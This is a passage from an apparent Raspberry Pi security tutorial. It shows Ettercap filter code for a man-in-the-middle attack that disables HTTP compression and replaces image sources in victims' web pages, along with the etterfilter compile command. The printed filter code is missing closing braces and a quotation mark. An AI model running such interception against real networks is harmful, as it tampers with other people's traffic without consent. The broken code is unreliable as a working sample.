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Pushing unexpected images to browser
Not only do man-in-the-middle attacks allow us to spy on the traffic as it passes
by, we also have the option of modifying the packets before we pass them on to its
rightful owner. To manipulate packet contents with Ettercap, we will first need to
build some filter code in nano :
pi@raspberrypi ~ $ nano myfilter.ecf
The following is our filter code:
if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Mischief");
if (ip.proto == TCP && tcp.src == 80) {
if (search(DATA.data, "<img")) {
replace("src=", "src=\"http://www.intestinate.com/tux.png\"
msg("Mischief Managed!\n");
The first block looks for any TCP packets with a destination of port 80 , that is,
packets that a web browser sends to a web server to request for pages. The filter then
peeks inside these packages and modifies the Accept-Encoding string in order to
stop the web server from compressing the returned pages. You see, if the pages are
compressed, we wouldn't be able to manipulate the HTML text inside the packet in
the next step.
The second block looks for TCP packets with a source port of 80 . Those are pages
returned to the web browser from the web server. We then search the package data
for the opening of HTML img tags, and if we find such a packet, we replace the src
attribute of the img tag with a URL to an image of your choice. Finally, we print out
an informational message to the Ettercap console to signal that our image prank was
performed successfully.
The next step is to compile our Ettercap filter code into a binary file that can be
interpreted by Ettercap, using the following command:
pi@raspberrypi ~ $ etterfilter myfilter.ecf -o myfilter.ef
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